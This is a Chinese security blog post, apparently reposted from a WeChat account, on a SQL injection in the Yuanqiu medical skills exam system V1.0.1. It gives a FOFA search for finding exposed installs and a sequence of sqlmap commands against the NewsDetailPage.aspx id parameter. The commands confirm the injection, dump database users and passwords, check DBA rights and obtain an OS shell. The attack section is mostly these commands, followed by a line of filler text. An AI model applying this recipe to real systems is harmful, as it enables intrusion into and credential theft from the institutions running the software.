远秋医学技能考试系统存在SQL注入

admin

102369
文章

87
评论

2022年7月22日16:37:01评论754 views字数 750阅读2分30秒阅读模式

漏洞简介

远秋医学在线考试考试系统采用通用的试题库管理软件。存在SQL注入漏洞，攻击者可以通过该漏洞getshell。

FOFA语句

app="远秋医学技能考试系统-V1.0.1"

影响范围

远秋医学技能考试系统-V1.0.1

漏洞复现

访问网站，文章处的id存在注入

远秋医学技能考试系统存在SQL注入

检测是否存在注入点，sqlmap语句

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=7" -p id -batch

远秋医学技能考试系统存在SQL注入

有些是经过了加密的注入不了，有大佬会的记得教教我呀！

远秋医学技能考试系统存在SQL注入

sqlmap跑用户和密码

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=7" -userssqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=7" --password

远秋医学技能考试系统存在SQL注入

查看是否为dba权限，sql语句

sqlmap -u "http://xxx.xxx.xxx.xxx/zzpjmz/WJList?cfpj=&sflx=sPbVwxF9" --is-dba -batch

远秋医学技能考试系统存在SQL注入

--os-shell获得shell,sql语句

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=7" --random-agent --os-shell

远秋医学技能考试系统存在SQL注入

凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数。。。。

原文始发于微信公众号（鹏组安全）：远秋医学技能考试系统存在SQL注入

左青龙
微信扫一扫

右白虎
微信扫一扫

远秋医学技能考试系统存在SQL注入

使用 SeImpersonateToken 权限从 NT 服务到 SYSTEM 的反射 DLL

ebpf在Android安全上的应用：结合binder完成一个行为检测沙箱(下篇)

浅谈Kubernetes安全

若依系统恰分攻略

HW必备技能教学之Windows应急响应常见流程【附应急工具】

技术实践｜大模型内容安全蓝军的道与术

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

发表评论

在线咨询

微信